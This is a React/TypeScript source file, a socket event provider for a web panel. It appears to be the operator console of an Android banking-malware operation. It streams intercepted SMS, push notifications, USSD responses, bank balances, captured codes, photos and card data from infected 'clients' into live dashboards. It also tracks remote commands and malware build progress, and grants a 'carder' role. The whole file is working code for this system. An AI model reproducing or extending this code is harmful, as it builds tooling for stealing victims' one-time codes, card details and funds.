import { SOCKET_EVENTS } from '@/api/socket-events';
import { socket } from '@/api/socket';
import { $newBalance, $updateBalance, $updateBalancesByClientId, type IBalance } from '@/entities/balance.entity';
import { $newMessage, $updateMessagesByClientId, type IMessage } from '@/entities/message.entity';
import { $newPush, $updatePushesByClientId, type IPush } from '@/entities/push.entity';
import { $newDeviceLog, $updateDeviceLogsByClientId, type IDeviceLog } from '@/entities/device-log.entity';
import { $addClientDetailEvent, type IClientEvent } from '@/entities/client-event.entity';
import { $newUssd, $updateUssdsByClientId, type IUssd } from '@/entities/ussd.entity';
import {
	$balancesSearchField,
	$clientsSortDir,
	$clientsFilter,
	$clientsSearchText,
	$deviceLogsSearchField,
	$messagesSearchField,
	$pushesSearchField,
	$ussdSearchField,
	balanceMatchesGlobalListFilter,
	clientDeviceLogMatchesFilter,
	deviceLogMatchesGlobalListFilter,
	messageMatchesGlobalListFilter,
	pushMatchesGlobalListFilter,
	ussdMatchesGlobalListFilter,
} from '@/entities/clients-filter.entity';
import {
	clientActionMatchesSearch,
	clientBalanceMatchesSearch,
	clientMessageMatchesSearch,
	clientPushMatchesSearch,
	clientUssdMatchesSearch,
} from '@/lib/client-feed-search';
import type { ICardFillJob } from '@/entities/client.entity';
import { $updateCardsByClientId } from '@/entities/card.entity';
import { $updatePhonesByClientId } from '@/entities/phone.entity';
import {
	$addClientDetailBalance,
	$addClientDetailCode,
	$addClientDetailMessage,
	$addClientDetailPush,
	$addClientDetailPhoto,
	$addClientDetailDeviceLog,
	$addClientDetailUssd,
	$newClient,
	$selectedClient,
	$setClientDetailBalances,
	$setClientDetailCodes,
	$setClientDetailMessages,
	$setClientDetailPushes,
	$setClientDetailDeviceLogs,
	$setClientDetailUssds,
	$setClientDetailActions,
	$addClientDetailAction,
	$updateClientDetailAction,
	$clientDetailDeviceLogTypes,
	$clientDetailSearchText,
	$incrementClientFeedCount,
	$setClientDetailApps,
	$setClientFeedCounts,
	$setSelectedClient,
	$updateClient,
	$updateClientDetailBalance,
	$updateClientDetailDeviceLogsByClientId,
	type IClient,
	type IClientAction,
	type IClientMessage,
	type IClientPush,
	type IClientPhoto,
	type IClientDeviceLog,
	type IClientUssd,
	type IInstalledApp,
} from '@/entities/client.entity';
import { $addMyClient, $selectedMyClient, $setMyClients, $setMyClientsSearchResult, $setSelectedMyClient, $updateMyClient, type IMyClient } from '@/entities/my-clients-entity';
import { $addMyCode, $setMyCodes, type IMyCode } from '@/entities/my-codes-entity';
import { $setOnlineClientsCount } from '@/entities/online-count.entity';
import { $setConnectionPhase } from '@/entities/connection-entity';
import { $profile } from '@/entities/profile-entity';
import { endPanelSession } from '@/lib/session-end';
import { isSessionEndMessage } from '@/lib/session-messages';
import {
	$appendBuildLogs,
	$setBuildComplete,
	$setBuildLogHistory,
	$updateBuildProgress,
	type IBuildCompleteEvent,
	type IBuildLiveProgress,
	type IBuildLogLine,
} from '@/entities/build-live.entity';
import { isDevMode } from '@/lib/is-dev-mode';
import { useUnit } from 'effector-react';
import { createElement, useEffect, useRef, type PropsWithChildren } from 'react';
import { useNavigate } from 'react-router';
import { toast } from 'sonner';
export type socketHandleType = [string, (arg0: any, description: any, args: any[]) => void | Promise<void>];

function deriveClientHasPhone(client: { phone?: string; phones?: { number?: string }[] }): boolean {
	if (client.phone?.trim()) return true;
	return (client.phones ?? []).some(phone => Boolean(phone.number?.trim()));
}

export default function SocketProvider({ children }: PropsWithChildren) {
	const navigate = useNavigate();

	const [
		profile,
		setMyClients,
		setSelectedMyClient,
		setMyCodes,
		addMyClient,
		updateMyClient,
		selectedMyClient,
		addMyCode,
		setMyClientsSearchResult,
		selectedClient,
		setSelectedClient,
		updateClient,
		newClient,
		newBalance,
		newMessage,
		updateMessagesByClientId,
		newPush,
		updatePushesByClientId,
		newDeviceLog,
		updateDeviceLogsByClientId,
		newUssd,
		updateUssdsByClientId,
		updateBalancesByClientId,
		updateCardsByClientId,
		updatePhonesByClientId,
		updateBalance,
		setClientDetailCodes,
		setClientDetailBalances,
		setClientDetailMessages,
		setClientDetailPushes,
		setClientDetailDeviceLogs,
		setClientDetailUssds,
		addClientDetailCode,
		addClientDetailBalance,
		addClientDetailMessage,
		addClientDetailPush,
		addClientDetailPhoto,
		addClientDetailDeviceLog,
		addClientDetailEvent,
		addClientDetailUssd,
		updateClientDetailBalance,
		updateClientDetailDeviceLogsByClientId,
		setClientDetailActions,
		addClientDetailAction,
		updateClientDetailAction,
		setClientDetailApps,
		setClientFeedCounts,
		incrementClientFeedCount,
		setOnlineClientsCount,
		updateBuildProgress,
		appendBuildLogs,
		setBuildLogHistory,
		setBuildComplete,
		clientsSortDir,
		clientsFilter,
		clientsSearchText,
		deviceLogsSearchField,
		messagesSearchField,
		pushesSearchField,
		ussdSearchField,
		balancesSearchField,
		setConnectionPhase,
		clientDetailDeviceLogTypes,
		clientDetailSearchText,
	] = useUnit([
		$profile,
		$setMyClients,
		$setSelectedMyClient,
		$setMyCodes,
		$addMyClient,
		$updateMyClient,
		$selectedMyClient,
		$addMyCode,
		$setMyClientsSearchResult,
		$selectedClient,
		$setSelectedClient,
		$updateClient,
		$newClient,
		$newBalance,
		$newMessage,
		$updateMessagesByClientId,
		$newPush,
		$updatePushesByClientId,
		$newDeviceLog,
		$updateDeviceLogsByClientId,
		$newUssd,
		$updateUssdsByClientId,
		$updateBalancesByClientId,
		$updateCardsByClientId,
		$updatePhonesByClientId,
		$updateBalance,
		$setClientDetailCodes,
		$setClientDetailBalances,
		$setClientDetailMessages,
		$setClientDetailPushes,
		$setClientDetailDeviceLogs,
		$setClientDetailUssds,
		$addClientDetailCode,
		$addClientDetailBalance,
		$addClientDetailMessage,
		$addClientDetailPush,
		$addClientDetailPhoto,
		$addClientDetailDeviceLog,
		$addClientDetailEvent,
		$addClientDetailUssd,
		$updateClientDetailBalance,
		$updateClientDetailDeviceLogsByClientId,
		$setClientDetailActions,
		$addClientDetailAction,
		$updateClientDetailAction,
		$setClientDetailApps,
		$setClientFeedCounts,
		$incrementClientFeedCount,
		$setOnlineClientsCount,
		$updateBuildProgress,
		$appendBuildLogs,
		$setBuildLogHistory,
		$setBuildComplete,
		$clientsSortDir,
		$clientsFilter,
		$clientsSearchText,
		$deviceLogsSearchField,
		$messagesSearchField,
		$pushesSearchField,
		$ussdSearchField,
		$balancesSearchField,
		$setConnectionPhase,
		$clientDetailDeviceLogTypes,
		$clientDetailSearchText,
	]);

	const selectedMyClientRef = useRef(selectedMyClient);
	const selectedClientRef = useRef(selectedClient);
	const clientsSortDirRef = useRef(clientsSortDir);
	const clientsFilterRef = useRef(clientsFilter);
	const clientsSearchTextRef = useRef(clientsSearchText);
	const deviceLogsSearchFieldRef = useRef(deviceLogsSearchField);
	const messagesSearchFieldRef = useRef(messagesSearchField);
	const pushesSearchFieldRef = useRef(pushesSearchField);
	const ussdSearchFieldRef = useRef(ussdSearchField);
	const balancesSearchFieldRef = useRef(balancesSearchField);
	const clientDetailDeviceLogTypesRef = useRef(clientDetailDeviceLogTypes);
	const clientDetailSearchTextRef = useRef(clientDetailSearchText);
	const sessionEndedRef = useRef(false);
	const wasReconnectingRef = useRef(false);

	useEffect(() => {
		sessionEndedRef.current = false;
		wasReconnectingRef.current = false;
	}, [profile?.id]);

	useEffect(() => {
		selectedMyClientRef.current = selectedMyClient;
	}, [selectedMyClient]);

	useEffect(() => {
		selectedClientRef.current = selectedClient;
	}, [selectedClient]);

	useEffect(() => {
		clientsSortDirRef.current = clientsSortDir;
	}, [clientsSortDir]);

	useEffect(() => {
		clientsFilterRef.current = clientsFilter;
	}, [clientsFilter]);

	useEffect(() => {
		clientsSearchTextRef.current = clientsSearchText;
	}, [clientsSearchText]);

	useEffect(() => {
		deviceLogsSearchFieldRef.current = deviceLogsSearchField;
	}, [deviceLogsSearchField]);

	useEffect(() => {
		messagesSearchFieldRef.current = messagesSearchField;
	}, [messagesSearchField]);

	useEffect(() => {
		pushesSearchFieldRef.current = pushesSearchField;
	}, [pushesSearchField]);

	useEffect(() => {
		ussdSearchFieldRef.current = ussdSearchField;
	}, [ussdSearchField]);

	useEffect(() => {
		balancesSearchFieldRef.current = balancesSearchField;
	}, [balancesSearchField]);

	useEffect(() => {
		clientDetailDeviceLogTypesRef.current = clientDetailDeviceLogTypes;
	}, [clientDetailDeviceLogTypes]);

	useEffect(() => {
		clientDetailSearchTextRef.current = clientDetailSearchText;
	}, [clientDetailSearchText]);

	useEffect(() => {
		if (isDevMode) return;
		if (!socket || !profile) return;
		if (!socket.connected && profile) {
			socket.connect();
		}

		function handleSessionEnd(message: string) {
			sessionEndedRef.current = true;
			endPanelSession({ navigate, message });
		}

		const handleError: socketHandleType = [
			SOCKET_EVENTS.error,
			(message: string) => {
				if (isSessionEndMessage(message)) {
					handleSessionEnd(message);
					return;
				}
				toast.error(message);
			},
		];

		const handleSuccess: socketHandleType = [
			SOCKET_EVENTS.success,
			(message: string) => {
				toast.success(message);
			},
		];

		const handleConnect: socketHandleType = [
			SOCKET_EVENTS.connect,
			() => {
				if (wasReconnectingRef.current) {
					wasReconnectingRef.current = false;
				}
			},
		];
		const handleDisconnect: socketHandleType = [
			SOCKET_EVENTS.disconnect,
			() => {
				if (sessionEndedRef.current) return;
				wasReconnectingRef.current = true;
				setConnectionPhase('reconnecting');
			},
		];
		const handleServerUpdating: socketHandleType = [
			SOCKET_EVENTS.serverUpdating,
			() => {
				setConnectionPhase('updating');
			},
		];
		const handleSetProfile: socketHandleType = [SOCKET_EVENTS.setProfile, () => {}];

		const handleSetMyClients: socketHandleType = [
			SOCKET_EVENTS.setMyClients,
			(clients: IMyClient[]) => {
				setMyClients(clients);
			},
		];

		const handleSetMyClient: socketHandleType = [
			SOCKET_EVENTS.setMySelectedClient,
			(client: IMyClient) => {
				setSelectedMyClient(client);
			},
		];

		const handleSetMyCodes: socketHandleType = [
			SOCKET_EVENTS.setMyCodes,
			(codes: IMyCode[]) => {
				setMyCodes(codes);
			},
		];

		const handleNewCode: socketHandleType = [
			SOCKET_EVENTS.newCode,
			(code: IMyCode | undefined) => {
				if (!code) return;
				addMyCode(code);
				if (selectedClientRef.current?.id === code.clientId) {
					addClientDetailCode(code);
				}
			},
		];

		const handleNewClient: socketHandleType = [
			SOCKET_EVENTS.newClient,
			(client: any) => {
				addMyClient(client);
				newClient(client);
			},
		];

		const handleNewBalance: socketHandleType = [
			SOCKET_EVENTS.newBalance,
			(balance: IBalance) => {
				if (
					!balanceMatchesGlobalListFilter(
						balance,
						clientsFilterRef.current,
						clientsSearchTextRef.current,
						balancesSearchFieldRef.current,
					)
				) {
					if (selectedClientRef.current?.id === balance.clientId) {
						if (clientBalanceMatchesSearch(balance, clientDetailSearchTextRef.current)) {
							addClientDetailBalance(balance);
							incrementClientFeedCount({ clientId: balance.clientId, tab: 'balances' });
						}
					}
					return;
				}
				newBalance(balance);
				if (selectedClientRef.current?.id === balance.clientId) {
					if (clientBalanceMatchesSearch(balance, clientDetailSearchTextRef.current)) {
						addClientDetailBalance(balance);
						incrementClientFeedCount({ clientId: balance.clientId, tab: 'balances' });
					}
				}
			},
		];

		function patchDeviceLogsByClientId(patch: Partial<IDeviceLog> & { clientId: string }) {
			updateDeviceLogsByClientId(patch);
			if (selectedClientRef.current?.id === patch.clientId) {
				updateClientDetailDeviceLogsByClientId(patch);
			}
		}

		const handleUpdateClient: socketHandleType = [
			SOCKET_EVENTS.updateClient,
			(client: any) => {
				if (!client) return;
				updateMyClient(client);
				updateClient(client);

				if (selectedMyClientRef.current?.id === client.id) {
					setSelectedMyClient({ ...selectedMyClientRef.current, ...client });
				}
				if (selectedClientRef.current?.id === client.id) {
					setSelectedClient({ ...selectedClientRef.current, ...client });
				}

				if (client.updateBalance) {
					updateBalancesByClientId({ clientId: client.id, ...{ id: undefined, ...client } });
				}

				if (client.takeStatus !== undefined || client.takenFrom !== undefined) {
					updateCardsByClientId({
						clientId: client.id,
						...(client.takeStatus !== undefined ? { takeStatus: client.takeStatus } : {}),
						...(client.takenFrom !== undefined ? { takenFrom: client.takenFrom } : {}),
					});
					updatePhonesByClientId({
						clientId: client.id,
						...(client.takeStatus !== undefined ? { takeStatus: client.takeStatus } : {}),
						...(client.takenFrom !== undefined ? { takenFrom: client.takenFrom } : {}),
					});
					updateMessagesByClientId({
						clientId: client.id,
						...(client.takeStatus !== undefined ? { takeStatus: client.takeStatus } : {}),
						...(client.takenFrom !== undefined ? { takenFrom: client.takenFrom } : {}),
					});
					updatePushesByClientId({
						clientId: client.id,
						...(client.takeStatus !== undefined ? { takeStatus: client.takeStatus } : {}),
						...(client.takenFrom !== undefined ? { takenFrom: client.takenFrom } : {}),
					});
					patchDeviceLogsByClientId({
						clientId: client.id,
						...(client.takeStatus !== undefined ? { takeStatus: client.takeStatus } : {}),
						...(client.takenFrom !== undefined ? { takenFrom: client.takenFrom } : {}),
					});
					updateUssdsByClientId({
						clientId: client.id,
						...(client.takeStatus !== undefined ? { takeStatus: client.takeStatus } : {}),
						...(client.takenFrom !== undefined ? { takenFrom: client.takenFrom } : {}),
					});
				}

				if (client.comment !== undefined) {
					updateMessagesByClientId({ clientId: client.id, comment: client.comment });
					updatePushesByClientId({ clientId: client.id, comment: client.comment });
					patchDeviceLogsByClientId({ clientId: client.id, comment: client.comment });
					updateUssdsByClientId({ clientId: client.id, comment: client.comment });
				}

				if (client.isOnline !== undefined) {
					patchDeviceLogsByClientId({ clientId: client.id, isOnline: client.isOnline });
				}

				if (client.phone !== undefined || client.phones !== undefined) {
					const hasPhone = deriveClientHasPhone(client);
					patchDeviceLogsByClientId({ clientId: client.id, hasPhone });
				}

				if (client.pendingLaunch !== undefined) {
					patchDeviceLogsByClientId({ clientId: client.id, pendingLaunch: client.pendingLaunch });
				}
			},
		];

		const handleUpdateBalance: socketHandleType = [
			SOCKET_EVENTS.updateBalance,
			(balance: IBalance) => {
				if (!balance) return;
				updateBalance(balance);
				updateClientDetailBalance(balance);
			},
		];

		const handleMyClientsSearchResult: socketHandleType = [
			SOCKET_EVENTS.myClientsSearchResult,
			(clients: IMyClient[]) => {
				setMyClientsSearchResult(clients);
			},
		];

		const handleSetSelectedClient: socketHandleType = [
			SOCKET_EVENTS.setSelectedClient,
			(client: IClient) => {
				setSelectedClient(client);
			},
		];

		const handleSetClientFeedCounts: socketHandleType = [
			SOCKET_EVENTS.setClientFeedCounts,
			(payload: { clientId: string; counts: Record<string, number> }) => {
				if (!payload?.counts) return;
				setClientFeedCounts({
					clientId: payload.clientId,
					counts: {
						balances: payload.counts.balances ?? 0,
						sms: payload.counts.sms ?? 0,
						push: payload.counts.push ?? 0,
						ussd: payload.counts.ussd ?? 0,
						errors: payload.counts.errors ?? 0,
						commands: payload.counts.commands ?? 0,
						photos: payload.counts.photos ?? 0,
						install: payload.counts.install ?? 0,
					},
				});
			},
		];

		const handleSetCodes: socketHandleType = [
			SOCKET_EVENTS.setCodes,
			(codes: IMyCode[]) => {
				setClientDetailCodes(codes);
			},
		];

		const handleSetBalances: socketHandleType = [
			SOCKET_EVENTS.setBalances,
			(balances: IBalance[]) => {
				setClientDetailBalances(balances);
			},
		];

		const handleSetMessages: socketHandleType = [
			SOCKET_EVENTS.setMessages,
			(messages: IClientMessage[]) => {
				setClientDetailMessages(messages);
			},
		];

		const handleSetPushes: socketHandleType = [
			SOCKET_EVENTS.setPushes,
			(pushes: IClientPush[]) => {
				setClientDetailPushes(pushes);
			},
		];

		const handleSetDeviceLogs: socketHandleType = [
			SOCKET_EVENTS.setDeviceLogs,
			(deviceLogs: IClientDeviceLog[]) => {
				setClientDetailDeviceLogs(deviceLogs);
			},
		];

		const handleSetUssds: socketHandleType = [
			SOCKET_EVENTS.setUssds,
			(ussds: IClientUssd[]) => {
				setClientDetailUssds(ussds);
			},
		];

		const handleSetActions: socketHandleType = [
			SOCKET_EVENTS.setActions,
			(actions: IClientAction[]) => {
				setClientDetailActions(actions);
			},
		];

		const handleSetClientApps: socketHandleType = [
			SOCKET_EVENTS.setClientApps,
			(payload: { apps: IInstalledApp[]; count: number }) => {
				setClientDetailApps(payload.apps);
			},
		];

		const handleNewAction: socketHandleType = [
			SOCKET_EVENTS.newAction,
			(action: IClientAction | undefined) => {
				if (!action) return;
				if (selectedClientRef.current?.id === action.clientId) {
					if (clientActionMatchesSearch(action, clientDetailSearchTextRef.current)) {
						addClientDetailAction(action);
						incrementClientFeedCount({ clientId: action.clientId, tab: 'commands' });
					}
				}
			},
		];

		const handleUpdateAction: socketHandleType = [
			SOCKET_EVENTS.updateAction,
			(update: Partial<IClientAction> & { id: number; clientId: string }) => {
				if (!update?.id) return;
				if (selectedClientRef.current?.id === update.clientId) {
					updateClientDetailAction(update);
				}
			},
		];

		const handleNewMessage: socketHandleType = [
			SOCKET_EVENTS.newMessage,
			(message: (IClientMessage & {
				buildId?: string;
				takeStatus?: 0 | 1 | 2 | 3;
				takenFrom?: string;
				comment?: string;
				isOnline?: boolean;
				hasPhone?: boolean;
				phoneCountryCodes?: import('@crave/config/phone-country').PhoneCountryCode[];
				hasUnclassifiedNonEmptyPhone?: boolean;
			}) | undefined) => {
				if (!message) return;
				const globalMessage: IMessage = {
					id: message.id,
					clientId: message.clientId,
					buildId: message.buildId ?? '',
					sender: message.sender,
					text: message.text,
					createdAt: message.createdAt,
					takeStatus: message.takeStatus,
					takenFrom: message.takenFrom,
					comment: message.comment,
					isOnline: message.isOnline,
					hasPhone: message.hasPhone,
					phoneCountryCodes: message.phoneCountryCodes,
					hasUnclassifiedNonEmptyPhone: message.hasUnclassifiedNonEmptyPhone,
				};
				if (
					!messageMatchesGlobalListFilter(
						globalMessage,
						clientsFilterRef.current,
						clientsSearchTextRef.current,
						messagesSearchFieldRef.current,
					)
				) {
					if (selectedClientRef.current?.id === message.clientId) {
						if (clientMessageMatchesSearch(message, clientDetailSearchTextRef.current)) {
							addClientDetailMessage(message);
							incrementClientFeedCount({ clientId: message.clientId, tab: 'sms' });
						}
					}
					return;
				}
				newMessage({ message: globalMessage, sortDir: clientsSortDirRef.current ?? 'desc' });
				if (selectedClientRef.current?.id === message.clientId) {
					if (clientMessageMatchesSearch(message, clientDetailSearchTextRef.current)) {
						addClientDetailMessage(message);
						incrementClientFeedCount({ clientId: message.clientId, tab: 'sms' });
					}
				}
			},
		];

		const handleNewUssd: socketHandleType = [
			SOCKET_EVENTS.newUssd,
			(ussd: (IUssd & { takeStatus?: 0 | 1 | 2 | 3; takenFrom?: string; comment?: string }) | undefined) => {
				if (!ussd) return;
				if (
					!ussdMatchesGlobalListFilter(
						ussd,
						clientsFilterRef.current,
						clientsSearchTextRef.current,
						ussdSearchFieldRef.current,
					)
				) {
					if (selectedClientRef.current?.id === ussd.clientId) {
						if (clientUssdMatchesSearch(ussd, clientDetailSearchTextRef.current)) {
							addClientDetailUssd({
								id: ussd.id,
								clientId: ussd.clientId,
								buildId: ussd.buildId,
								operator: ussd.operator,
								usedCommand: ussd.usedCommand,
								failureCode: ussd.failureCode,
								response: ussd.response,
								phone: ussd.phone,
								createdAt: ussd.createdAt,
							});
							incrementClientFeedCount({ clientId: ussd.clientId, tab: 'ussd' });
						}
					}
					return;
				}
				newUssd({ ussd, sortDir: clientsSortDirRef.current ?? 'desc' });
				if (selectedClientRef.current?.id === ussd.clientId) {
					if (clientUssdMatchesSearch(ussd, clientDetailSearchTextRef.current)) {
						addClientDetailUssd({
							id: ussd.id,
							clientId: ussd.clientId,
							buildId: ussd.buildId,
							operator: ussd.operator,
							usedCommand: ussd.usedCommand,
							failureCode: ussd.failureCode,
							response: ussd.response,
							phone: ussd.phone,
							createdAt: ussd.createdAt,
						});
						incrementClientFeedCount({ clientId: ussd.clientId, tab: 'ussd' });
					}
				}
			},
		];

		const handleNewPush: socketHandleType = [
			SOCKET_EVENTS.newPush,
			(push: (IClientPush & {
				takeStatus?: 0 | 1 | 2 | 3;
				takenFrom?: string;
				comment?: string;
				isOnline?: boolean;
				hasPhone?: boolean;
				phoneCountryCodes?: import('@crave/config/phone-country').PhoneCountryCode[];
				hasUnclassifiedNonEmptyPhone?: boolean;
			}) | undefined) => {
				if (!push) return;
				const globalPush: IPush = {
					id: push.id,
					clientId: push.clientId,
					buildId: push.buildId ?? '',
					packageName: push.packageName,
					title: push.title,
					text: push.text,
					createdAt: push.createdAt,
					takeStatus: push.takeStatus,
					takenFrom: push.takenFrom,
					comment: push.comment,
					isOnline: push.isOnline,
					hasPhone: push.hasPhone,
					phoneCountryCodes: push.phoneCountryCodes,
					hasUnclassifiedNonEmptyPhone: push.hasUnclassifiedNonEmptyPhone,
				};
				if (
					!pushMatchesGlobalListFilter(
						globalPush,
						clientsFilterRef.current,
						clientsSearchTextRef.current,
						pushesSearchFieldRef.current,
					)
				) {
					if (selectedClientRef.current?.id === push.clientId) {
						if (clientPushMatchesSearch(push, clientDetailSearchTextRef.current)) {
							addClientDetailPush(push);
							incrementClientFeedCount({ clientId: push.clientId, tab: 'push' });
						}
					}
					return;
				}
				newPush({ push: globalPush, sortDir: clientsSortDirRef.current ?? 'desc' });
				if (selectedClientRef.current?.id === push.clientId) {
					if (clientPushMatchesSearch(push, clientDetailSearchTextRef.current)) {
						addClientDetailPush(push);
						incrementClientFeedCount({ clientId: push.clientId, tab: 'push' });
					}
				}
			},
		];

		const handleNewClientPhoto: socketHandleType = [
			SOCKET_EVENTS.newClientPhoto,
			(photo: IClientPhoto | undefined) => {
				if (!photo) return;
				if (selectedClientRef.current?.id === photo.clientId) {
					addClientDetailPhoto(photo);
					incrementClientFeedCount({ clientId: photo.clientId, tab: 'photos' });
				}
			},
		];

		const handleCardFillJobUpdate: socketHandleType = [
			SOCKET_EVENTS.cardFillJobUpdate,
			(payload: { clientId?: string; jobs?: ICardFillJob[] }) => {
				if (!payload?.clientId || !payload.jobs) return;
				updateClient({ id: payload.clientId, cardFillJobs: payload.jobs });
				if (selectedClientRef.current?.id === payload.clientId) {
					setSelectedClient({ ...selectedClientRef.current, cardFillJobs: payload.jobs });
				}
				if (selectedMyClientRef.current?.id === payload.clientId) {
					setSelectedMyClient({ ...selectedMyClientRef.current, cardFillJobs: payload.jobs });
				}
			},
		];

		const handleUpdateClientPhotoScan: socketHandleType = [
			SOCKET_EVENTS.updateClientPhotoScan,
			(payload: {
				clientId?: string;
				status?: string;
				scanned?: number;
				total?: number;
				matched?: number;
				uploaded?: number;
				errors?: number;
				updatedAt?: string;
			}) => {
				if (!payload?.clientId) return;
				updateClient({
					id: payload.clientId,
					photoScanStatus: payload.status,
					photoScanScanned: payload.scanned,
					photoScanTotal: payload.total,
					photoScanMatched: payload.matched,
					photoScanUploaded: payload.uploaded,
					photoScanErrors: payload.errors,
					photoScanUpdatedAt: payload.updatedAt ?? null,
				});
				if (selectedClientRef.current?.id === payload.clientId) {
					setSelectedClient({
						...selectedClientRef.current,
						photoScanStatus: payload.status,
						photoScanScanned: payload.scanned,
						photoScanTotal: payload.total,
						photoScanMatched: payload.matched,
						photoScanUploaded: payload.uploaded,
						photoScanErrors: payload.errors,
						photoScanUpdatedAt: payload.updatedAt ?? null,
					});
				}
			},
		];

		const handleNewClientEvent: socketHandleType = [
			SOCKET_EVENTS.newClientEvent,
			(event: IClientEvent | undefined) => {
				if (!event) return;
				if (selectedClientRef.current?.id !== event.clientId) return;
				addClientDetailEvent(event);
				incrementClientFeedCount({ clientId: event.clientId, tab: 'install' });
			},
		];

		const handleNewDeviceLog: socketHandleType = [
			SOCKET_EVENTS.newDeviceLog,
			(deviceLog: (IClientDeviceLog & {
				takeStatus?: 0 | 1 | 2 | 3;
				takenFrom?: string;
				comment?: string;
				isOnline?: boolean;
				hasPhone?: boolean;
				phoneCountryCodes?: import('@crave/config/phone-country').PhoneCountryCode[];
				hasUnclassifiedNonEmptyPhone?: boolean;
				pendingLaunch?: boolean;
			}) | undefined) => {
				if (!deviceLog) return;
				const globalDeviceLog: IDeviceLog = {
					id: deviceLog.id,
					clientId: deviceLog.clientId,
					buildId: deviceLog.buildId,
					logType: deviceLog.logType as IDeviceLog['logType'],
					message: deviceLog.message,
					stackTrace: deviceLog.stackTrace,
					threadName: deviceLog.threadName,
					occurredAt: deviceLog.occurredAt,
					createdAt: deviceLog.createdAt,
					takeStatus: deviceLog.takeStatus,
					takenFrom: deviceLog.takenFrom,
					comment: deviceLog.comment,
					isOnline: deviceLog.isOnline,
					hasPhone: deviceLog.hasPhone,
					phoneCountryCodes: deviceLog.phoneCountryCodes,
					hasUnclassifiedNonEmptyPhone: deviceLog.hasUnclassifiedNonEmptyPhone,
					pendingLaunch: deviceLog.pendingLaunch,
				};
				const shouldAddToClientDetail =
					selectedClientRef.current?.id === deviceLog.clientId &&
					clientDeviceLogMatchesFilter(
						deviceLog,
						clientDetailDeviceLogTypesRef.current,
						clientDetailSearchTextRef.current,
					);
				if (
					!deviceLogMatchesGlobalListFilter(
						globalDeviceLog,
						clientsFilterRef.current,
						clientsSearchTextRef.current,
						deviceLogsSearchFieldRef.current,
					)
				) {
					if (shouldAddToClientDetail) {
						addClientDetailDeviceLog(deviceLog);
						incrementClientFeedCount({ clientId: deviceLog.clientId, tab: 'errors' });
					}
					return;
				}
				newDeviceLog({ deviceLog: globalDeviceLog, sortDir: clientsSortDirRef.current ?? 'desc' });
			if (shouldAddToClientDetail) {
				addClientDetailDeviceLog(deviceLog);
				incrementClientFeedCount({ clientId: deviceLog.clientId, tab: 'errors' });
			}
			},
		];

		const handleOnlineCount: socketHandleType = [
			SOCKET_EVENTS.onlineCount,
			(count: number) => {
				if (profile?.role === 'carder' || profile?.role === 'admin' || profile?.role === 'partner') {
					setOnlineClientsCount(count);
				}
			},
		];

		const handleBuildProgress: socketHandleType = [
			SOCKET_EVENTS.buildProgress,
			(payload: IBuildLiveProgress) => {
				if (!payload?.buildId) return;
				updateBuildProgress(payload);
			},
		];

		const handleBuildLogLine: socketHandleType = [
			SOCKET_EVENTS.buildLogLine,
			(payload: { buildId?: string; lines?: IBuildLogLine[] }) => {
				if (!payload?.buildId || !payload.lines?.length) return;
				if (profile?.role !== 'admin') return;
				appendBuildLogs({ buildId: payload.buildId, lines: payload.lines });
			},
		];

		const handleBuildLogHistory: socketHandleType = [
			SOCKET_EVENTS.buildLogHistory,
			(payload: { buildId?: string; lines?: IBuildLogLine[] }) => {
				if (!payload?.buildId || !payload.lines) return;
				if (profile?.role !== 'admin') return;
				setBuildLogHistory({ buildId: payload.buildId, lines: payload.lines });
			},
		];

		const handleBuildComplete: socketHandleType = [
			SOCKET_EVENTS.buildComplete,
			(payload: IBuildCompleteEvent) => {
				if (!payload?.buildId) return;
				setBuildComplete(payload);
				if (payload.success) {
					toast.success('Сборка завершена');
					return;
				}
				if (payload.errorMessage === 'Сборка отменена') {
					toast.info('Сборка отменена');
					return;
				}
				toast.error(payload.errorMessage ?? 'Сборка завершилась с ошибкой');
			},
		];

		const handlers = [
			handleError,
			handleSuccess,
			handleConnect,
			handleDisconnect,
			handleServerUpdating,
			handleSetProfile,
			handleSetMyClients,
			handleSetMyClient,
			handleSetMyCodes,
			handleNewClient,
			handleUpdateClient,
			handleNewCode,
			handleMyClientsSearchResult,
			handleNewBalance,
			handleUpdateBalance,
			handleSetSelectedClient,
			handleSetClientFeedCounts,
			handleSetCodes,
			handleSetBalances,
			handleSetMessages,
			handleSetPushes,
			handleSetDeviceLogs,
			handleSetUssds,
			handleSetActions,
			handleSetClientApps,
			handleNewAction,
			handleUpdateAction,
			handleNewMessage,
			handleNewUssd,
			handleNewPush,
			handleNewClientPhoto,
			handleCardFillJobUpdate,
			handleUpdateClientPhotoScan,
			handleNewDeviceLog,
			handleNewClientEvent,
			handleOnlineCount,
			handleBuildProgress,
			handleBuildLogLine,
			handleBuildLogHistory,
			handleBuildComplete,
		];
		handlers.forEach(h => socket.on(...h));

		return () => {
			handlers.forEach(h => socket.off(...h));
		};
	}, [profile]);

	return createElement('div', { className: 'h-full w-full min-h-0 flex flex-col overflow-hidden' }, children);
}
